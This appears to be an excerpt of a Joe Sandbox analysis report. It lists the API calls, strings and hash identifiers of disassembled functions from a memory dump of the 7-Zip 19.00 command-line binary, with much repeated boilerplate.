                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: fputs$free
                                                                                                                                                                                                        • String ID: : Can not open the file as [$ERROR$Open $WARNING$] archive
                                                                                                                                                                                                        • API String ID: 3873070119-2741933734
                                                                                                                                                                                                        • Opcode ID: f32defa99fa0ddd8f5ee8d7903e4695ca461ad93e2af0abed86e02622ffafdb7
                                                                                                                                                                                                        • Instruction ID: 22a0b633ca7b70f470ee579322c992860c86601d66a0c8471b123a42a1028846
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f32defa99fa0ddd8f5ee8d7903e4695ca461ad93e2af0abed86e02622ffafdb7
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 42F06D65301E06E1EE10DF26E8943A97361FB5AFD5F849022DE1E43360DF2CC689C314
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: 92278cdab0ad5069273e32549c2c9c770d2a5dfe6a62cd2ad7786a5c7567a585
                                                                                                                                                                                                        • Instruction ID: d26ab79908264d73b7b56ba26d7fd74430bbd4577c106b0cb70bad7ebc091937
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 92278cdab0ad5069273e32549c2c9c770d2a5dfe6a62cd2ad7786a5c7567a585
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 96E15732315B8196DB54EF26E49476EB7A0F789B84F0480A2EF8E97725DF38C859C700
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00B56F6D
                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00B56F78
                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00B56F85
                                                                                                                                                                                                          • Part of subcall function 00B5339C: free.MSVCRT ref: 00B533D7
                                                                                                                                                                                                          • Part of subcall function 00B5339C: memmove.MSVCRT(00000000,?,?,00000000,00B510A8), ref: 00B533F2
                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00B57023
                                                                                                                                                                                                        • SetLastError.KERNEL32 ref: 00B5705C
                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00B57086
                                                                                                                                                                                                          • Part of subcall function 00B56C84: CreateDirectoryW.KERNEL32 ref: 00B56CA8
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CountCurrentErrorLastTick$CreateDirectoryProcessThreadfreememmove
                                                                                                                                                                                                        • String ID: .tmp$d
                                                                                                                                                                                                        • API String ID: 3444860307-2797371523
                                                                                                                                                                                                        • Opcode ID: 855db8f89ad4192e1f7aaf537696d0c704f64e19782212e671a724ccd2b912be
                                                                                                                                                                                                        • Instruction ID: 18d41f82d372f391a92abec9f760f21ae3284d1bab09b9493269dfb34a2455eb
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 855db8f89ad4192e1f7aaf537696d0c704f64e19782212e671a724ccd2b912be
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 04311226358250D7DB209B26F88076DB3E1F794BD6F4841A2EF8687B60DF79C48AC701
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$AddressHandleModuleProc
                                                                                                                                                                                                        • String ID: CreateHardLinkW$kernel32.dll
                                                                                                                                                                                                        • API String ID: 399046674-294928789
                                                                                                                                                                                                        • Opcode ID: 0711bf2b160802de48a7ad8e62ea8a456af0d095c717e74070ad8e7392e23327
                                                                                                                                                                                                        • Instruction ID: 6fe7f79e3ab35e0590db4dc7a8721e746581350199a100f1cba13cbf2c6f82f3
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0711bf2b160802de48a7ad8e62ea8a456af0d095c717e74070ad8e7392e23327
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A321C72331694141CE61EB25EC5176F6790EBC2BE2F8412E1BE9A97764DE28C84EC600
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: 7aae74738ebb1fa26e9c45f1fe68a2e26c39cce5353d9637d771cf3076791eab
                                                                                                                                                                                                        • Instruction ID: 7f524bdf802cbc3c79b96dd703c0da1493c0a476ce408887dfbad27c98cb7559
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7aae74738ebb1fa26e9c45f1fe68a2e26c39cce5353d9637d771cf3076791eab
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0C519323316A4085CA25EF25E85136B67E0EBC6BE6B4802E5FF5E47795DF38C54ACB00
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: 4f627721fd3f548a9e12361352d12e7f0c520e4151b4dacedd918d3c46c14af4
                                                                                                                                                                                                        • Instruction ID: ab97063bba87443fb1e6d6684b0c7bd50a8fb73fd7957b3be94cbadcb809f228
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4f627721fd3f548a9e12361352d12e7f0c520e4151b4dacedd918d3c46c14af4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: DF418E23716D8086DB30AF15E8C026D63A1F7897A5F5902B6EF5E27B14DB3CCC868B40
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: e1faaf7df75186d5ae884903546cdcce3f308a231f1a81c91827175cf65db9ce
                                                                                                                                                                                                        • Instruction ID: f075f8b25fc81876c9774e183ef19f0b2b56367a08ab9ef9ed807fd8d5251fc3
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e1faaf7df75186d5ae884903546cdcce3f308a231f1a81c91827175cf65db9ce
                                                                                                                                                                                                        • Instruction Fuzzy Hash: D091CE72206F4086CB20EF25E49075FB7E0F795B94F505296EE9A477A8DF78C889CB40
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: d553175bd705add0397085a2f68dee216f55efb8e0660d055bcfc610d1b73714
                                                                                                                                                                                                        • Instruction ID: 54176dfbeb5cb5c47c1f602d0757df726a20f346969fc28b19c3d1fc5c7df142
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d553175bd705add0397085a2f68dee216f55efb8e0660d055bcfc610d1b73714
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6551496720AAC485C620EF2AE49079F77A5F786B85F045492DF8E63B24CF39C446CB04
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: 9943e524698941380e30c423019f5bc2cf16f063716f467c35492b6a2cf77687
                                                                                                                                                                                                        • Instruction ID: 0fa675fcf00d97f57429e481d23293e9b7e7fe28d28b011195cbec46f2e96c5b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9943e524698941380e30c423019f5bc2cf16f063716f467c35492b6a2cf77687
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E841CAB7306F8481CA24EB2AE49036A73A5F78AF95F4594A2DE4E53724DF38C496C700
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: 49e297252a2c8ca67cda62bdf5dff8c128a9f435b231509b57c7dc761cb252a3
                                                                                                                                                                                                        • Instruction ID: d227fd323a7e087a6e36bc8bac47011bc8e6771ead129b5ae25695434b637952
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 49e297252a2c8ca67cda62bdf5dff8c128a9f435b231509b57c7dc761cb252a3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9A114C2370388488CB11AF26DD513A92361EB86F95F1D81F1AF2D6B369DE24C8468750
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$memmove
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1534225298-0
                                                                                                                                                                                                        • Opcode ID: 37bd50d8d1977fdd302a0b82f53c3d6d511d758968c823be9149fe37c82b5d04
                                                                                                                                                                                                        • Instruction ID: f9c2ba24fb42387a62726a33d4a6a39086f40a64854fff0b68f73e22953073dc
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 37bd50d8d1977fdd302a0b82f53c3d6d511d758968c823be9149fe37c82b5d04
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4F014823313D4492CA04EF26DE9126D7360FB86F9670441E2AF2E5BB65DF20D86ACB44
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID: /$\$a$z
                                                                                                                                                                                                        • API String ID: 1294909896-3795456795
                                                                                                                                                                                                        • Opcode ID: 92741b9c6097dc57a5422346ae12ec5673efaeb8d1b2f3031f7aecb4c5395baf
                                                                                                                                                                                                        • Instruction ID: 61aaddf34aae766e5c7d9db509cbf54c46f192cfe72394eb5167de1aedd7b0c8
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 92741b9c6097dc57a5422346ae12ec5673efaeb8d1b2f3031f7aecb4c5395baf
                                                                                                                                                                                                        • Instruction Fuzzy Hash: CA41A092A0029899DB30FB61D4047F937E0F361BE4F8942A6DE95433B4FB7989D6D701
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • 7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21, xrefs: 00B9877E
                                                                                                                                                                                                        • Usage: 7z <command> [<switches>...] <archive_name> [<file_names>...] [@listfile]<Commands> a : Add files to archive b : Benchmark d : Delete files from archive e : Extract files from archive (without using directory names) h : Calculate hash values, xrefs: 00B9878E
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$fputs
                                                                                                                                                                                                        • String ID: 7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21$Usage: 7z <command> [<switches>...] <archive_name> [<file_names>...] [@listfile]<Commands> a : Add files to archive b : Benchmark d : Delete files from archive e : Extract files from archive (without using directory names) h : Calculate hash values
                                                                                                                                                                                                        • API String ID: 2444650769-4238946813
                                                                                                                                                                                                        • Opcode ID: 6a807e1f11532017a4cdd53ea1c09d8dec3d45ef8e00fbcf8e020d56cf8062a2
                                                                                                                                                                                                        • Instruction ID: 3b61992c8f8d3a73e3d70d06d017d00816bc87d56f3b652618678e8f47bf80f9
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6a807e1f11532017a4cdd53ea1c09d8dec3d45ef8e00fbcf8e020d56cf8062a2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C721936330668195CE30DB65F9803AAB3A1F786785F9844B1CA4D97718CF3CC889CB44
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                                                                        • String ID: FindFirstStreamW$FindNextStreamW$kernel32.dll
                                                                                                                                                                                                        • API String ID: 1646373207-4044117955
                                                                                                                                                                                                        • Opcode ID: ac966f64d20482aa4fd5c134ec705327a834465029026a46f097207993e27cb5
                                                                                                                                                                                                        • Instruction ID: 1e323cbdba1a9558a94cdb8c16d640127597b19cb0db9e4cb4facd1989f01209
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ac966f64d20482aa4fd5c134ec705327a834465029026a46f097207993e27cb5
                                                                                                                                                                                                        • Instruction Fuzzy Hash: CFE07E68642A0792EA44DF51F8A836433A0F759761F904025D60A83320EF7CC55AC700
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$memmove
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1534225298-0
                                                                                                                                                                                                        • Opcode ID: a041cbdb6f5740e4120ede61be48ff6f97309ac3af8f67b0fadf56b6372aeade
                                                                                                                                                                                                        • Instruction ID: 015bb2fccec09ff8aac198d2bc5b44f580bfcfd0cc1d1db4f6399f9763818ff9
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a041cbdb6f5740e4120ede61be48ff6f97309ac3af8f67b0fadf56b6372aeade
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F631AC63715F8042DA20DF26D49035E6791EB96FE6B0C41E1FF6E17799CF19C44A8B40
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$ErrorLast
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 408039514-0
                                                                                                                                                                                                        • Opcode ID: ba39d191a4783be6191a4353f763b9374f22025bd81bbd69dc5c6e5eb5e84779
                                                                                                                                                                                                        • Instruction ID: 1a63a4767b233279c0ce46889a884928841a4707d03c6285b548274c82a78023
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ba39d191a4783be6191a4353f763b9374f22025bd81bbd69dc5c6e5eb5e84779
                                                                                                                                                                                                        • Instruction Fuzzy Hash: CE317423325980C7C730EF25E89025AB7A0F7C6794F4451A6EB9E87B65DF39D859CB00
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: memcmp
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1475443563-0
                                                                                                                                                                                                        • Opcode ID: 41d9d86949f01cac63a720bc7b2bd3e9f688eab33a43bcd64fe82cf42b54a768
                                                                                                                                                                                                        • Instruction ID: 5834a9fb42795fea163b8507f10d660f4dc558ab4e19c293e696576cee3f549b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 41d9d86949f01cac63a720bc7b2bd3e9f688eab33a43bcd64fe82cf42b54a768
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 43319CA130871191EF04EF26D8D23A823A5DB4AFD4FC890E1DE26A7226EF74DA45C305
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
